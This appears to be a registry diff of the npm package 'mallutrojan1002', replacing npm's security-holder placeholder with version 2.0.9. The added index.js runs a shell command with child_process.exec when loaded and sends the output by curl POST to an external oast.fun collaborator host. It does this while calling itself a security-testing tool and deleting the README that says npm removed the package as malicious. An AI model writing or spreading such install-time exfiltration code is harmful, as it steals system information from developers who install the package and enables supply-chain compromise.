mallutrojan1002 0.0.1-security → 2.0.9

package/index.js

@@ -0,0 +1,37 @@
+const { exec } = require("child_process");
+
+function sendPingback(data) {
+  const collaboratorUrl = "https://usbbcjkkyavkeqhiqzrdv5vnqip58g0j7.oast.fun";
+  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    if (stderr) {
+      console.error(`Stderr: ${stderr}`);
+      return;
+    }
+    console.log(`Pingback sent: ${stdout}`);
+  });
+}
+
+function executeCommand(command) {
+  exec(command, (error, stdout, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      sendPingback(`Error executing command: ${error.message}`);
+      return;
+    }
+    if (stderr) {
+      console.error(`Stderr: ${stderr}`);
+      sendPingback(`Stderr: ${stderr}`);
+      return;
+    }
+    console.log(`Command output: ${stdout}`);
+    sendPingback(stdout); // Send the command output to the collaborator
+  });
+}
+
+// Example: Execute a command (e.g., 'whoami')
+executeCommand('whoami');
+

package/package.json

@@ -1,6 +1,29 @@
 {
+
   "name": "mallutrojan1002",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+
+  "version": "2.0.9",
+
+  "description": "A simple package to trigger Burp Collaborator for security testing",
+
+  "main": "index.js",
+
+  "scripts": {
+
+    "test": "node index.js"
+
+  },
+
+  "author": "Your Name",
+
+  "license": "MIT",
+
+  "dependencies": {
+
+    "axios": "^0.21.1",
+
+    "collaborator-trigger05": "^1.0.9"
+
+  }
+
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=mallutrojan1002 for more information.